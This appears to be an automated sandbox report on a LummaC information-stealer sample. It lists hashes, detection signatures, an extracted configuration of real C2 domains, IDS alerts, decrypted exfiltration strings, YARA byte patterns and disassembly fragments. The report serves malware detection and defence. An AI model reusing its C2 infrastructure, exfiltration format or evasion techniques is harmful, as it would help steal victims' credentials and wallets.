Windows Analysis Report
AZCFTWko2q.exe

Overview

General Information

Sample name: AZCFTWko2q.exe (renamed because the original name is a hash value)
Original sample name: 7c13e0cbd1513abe7f2d2d73cc0ad615.exe
Analysis ID: 1575332
MD5: 7c13e0cbd1513abe7f2d2d73cc0ad615
SHA1: 375062b73661432e50e66cf08557ff3b737c8914
SHA256: 979cfe34baa41bc1556c9349402ced4242d6a7b3f0197d9e07643caa363daa93
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • AZCFTWko2q.exe (PID: 3284 cmdline: "C:\Users\user\Desktop\AZCFTWko2q.exe" MD5: 7C13E0CBD1513ABE7F2D2D73CC0AD615)
    • 86DC.tmp.exe (PID: 5868 cmdline: "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)
      • WerFault.exe (PID: 5556 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["awake-weaves.cyou", "effecterectz.xyz", "sordid-snaked.cyou", "deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "immureprech.biz"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -

Source | Rule | Description | Author | Strings
00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1278:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xfb0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -

Source | Rule | Description | Author | Strings
3.3.86DC.tmp.exe.2510000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
3.3.86DC.tmp.exe.2510000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
3.2.86DC.tmp.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
3.2.86DC.tmp.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-15T09:20:31.198097+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:33.274722+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:36.684902+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49711 | 23.55.153.106 | 443 | TCP
2024-12-15T09:20:31.911159+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:34.267261+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:31.911159+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:34.267261+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:33.274722+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:31.198097+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:34.868837+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 50855 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:31.916295+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 52321 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.582731+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 56023 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.441300+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 51869 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.296521+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 54571 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:29.821766+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 50741 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:29.679458+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 50583 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:35.009441+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59245 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.727477+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49571 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:23.689288+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49705 | 104.21.56.70 | 443 | TCP
2024-12-15T09:20:25.258834+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49706 | 176.113.115.19 | 80 | TCP
2024-12-15T09:20:37.462041+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49711 | 23.55.153.106 | 443 | TCP

                AV Detection

Source: AZCFTWko2q.exe | Avira: detected
Source: https://wrathful-jammy.cyou/2 | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apio | Avira URL Cloud: Label: malware
Source: https://sordid-snaked.cyou/apims | Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/pi | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/i | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/Ds | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: 3.3.86DC.tmp.exe.2510000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "effecterectz.xyz", "sordid-snaked.cyou", "deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "immureprech.biz"], "Build id": "4h5VfH--"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | ReversingLabs: Detection: 62%
Source: AZCFTWko2q.exe | Virustotal: Detection: 56%
Source: AZCFTWko2q.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Joe Sandbox ML: detected
Source: AZCFTWko2q.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: awake-weaves.cyou
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: debonairnukk.xyz
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: diffuculttan.xyz
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: effecterectz.xyz
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: deafeninggeh.biz
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: immureprech.biz
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: 4h5VfH--

                Compliance

Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Unpacked PE file: 0.2.AZCFTWko2q.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Unpacked PE file: 3.2.86DC.tmp.exe.400000.0.unpack
Source: AZCFTWko2q.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004389F2 FindFirstFileExW | 0_2_004389F2
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024F8C59 FindFirstFileExW | 0_2_024F8C59
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_0043CD60
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0040E83B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0040C917
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C1F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B195
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_0043B9A1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_004369A0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0041E9B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_004299B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_0042526A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebx, edi3_2_0041D270
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov esi, eax3_2_00423A34
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C280
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0043AAB2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov eax, ebx3_2_0041CB05
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_0043CB20
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, eax3_2_00427326
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]3_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042A3D0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042C45C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00436C00
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00418578
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, eax3_2_0042750D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00421D10
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0040DD25
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040BDC9
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00417582
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00427DA2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_004205B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C64A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE48
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_00426E50
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE24
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433630
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C6E4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00425E90
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_0043CE90
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004166A0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEA0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042ADF4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov eax, edx3_2_0041C6BB
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_0043BF40
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00415F66
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0043A777
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C726
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C735
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DF80
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_024AD25A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_024AD25A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_024DC268
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024DB2CF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB2CF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024DB2C4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB2C4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024DB2C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB2C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB3FC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_024C63B6
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, edx3_2_024AC030
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_024C70E4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_024DD0F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_024C60F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CB08B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CB0AF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024CB05B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 3_2_024BE1E7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_024CA637
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024CC6C3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_024CB763
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024CB763
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then jmp eax | 3_2_024C6739
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ecx, dword ptr [esi+64h] | 3_2_024B87DF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh] | 3_2_024B77E9
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then jmp ecx | 3_2_024DC79B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov edx, eax | 3_2_024C7797
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 4x nop then mov ebx, edi | 3_2_024BD4D7
